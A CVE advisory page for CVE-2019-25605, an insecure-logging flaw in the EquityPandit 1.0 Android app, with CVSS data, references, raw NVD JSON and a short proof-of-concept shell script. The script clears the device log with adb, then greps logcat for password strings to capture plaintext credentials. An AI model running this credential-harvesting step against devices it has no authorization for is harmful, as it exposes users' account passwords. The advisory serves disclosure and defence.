CVE-2019-25605

Description

EquityPandit 1.0 contains an insecure logging vulnerability that allows attackers to capture sensitive user credentials by accessing developer console logs via Android Debug Bridge. Attackers can use adb logcat to extract plaintext passwords logged during the forgot password function, exposing user account credentials.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

EquityPandit 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash

# PoC for CVE-2019-25605: EquityPandit Insecure Logging
# Description: Retrieves plaintext passwords from Android logcat.

# Step 1: Check ADB connection
adb devices

# Step 2: Clear logcat buffer to reduce noise
adb logcat -c

# Step 3: Instruct user to trigger the 'Forgot Password' function on the device
echo "Please trigger the 'Forgot Password' function on the EquityPandit app now..."

# Step 4: Monitor logs for potential password leaks
# Common keywords to search for: 'password', 'pass', 'secret', or specific app package
adb logcat -v time | grep -i -E "password|pass|secret"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25605
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25605
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25605/
[4] VulDB https://vuldb.com/cve/CVE-2019-25605
[5] https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
[6] https://www.exploit-db.com/exploits/46933
[7] https://www.vulncheck.com/advisories/equitypandit-insecure-logging-information-disclosure

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25605", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:28.260", "lastModified": "2026-04-15T15:00:32.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EquityPandit 1.0 contains an insecure logging vulnerability that allows attackers to capture sensitive user credentials by accessing developer console logs via Android Debug Bridge. Attackers can use adb logcat to extract plaintext passwords logged during the forgot password function, exposing user account credentials."}, {"lang": "es", "value": "EquityPandit 1.0 contiene una vulnerabilidad de registro inseguro que permite a los atacantes capturar credenciales de usuario sensibles al acceder a los registros de la consola de desarrollador a través de Android Debug Bridge. Los atacantes pueden usar adb logcat para extraer contraseñas en texto plano registradas durante la función de recuperación de contraseña, exponiendo las credenciales de la cuenta de usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-612"}]}], "references": [{"url": "https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46933", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/equitypandit-insecure-logging-information-disclosure", "source": "[email protected]"}]}}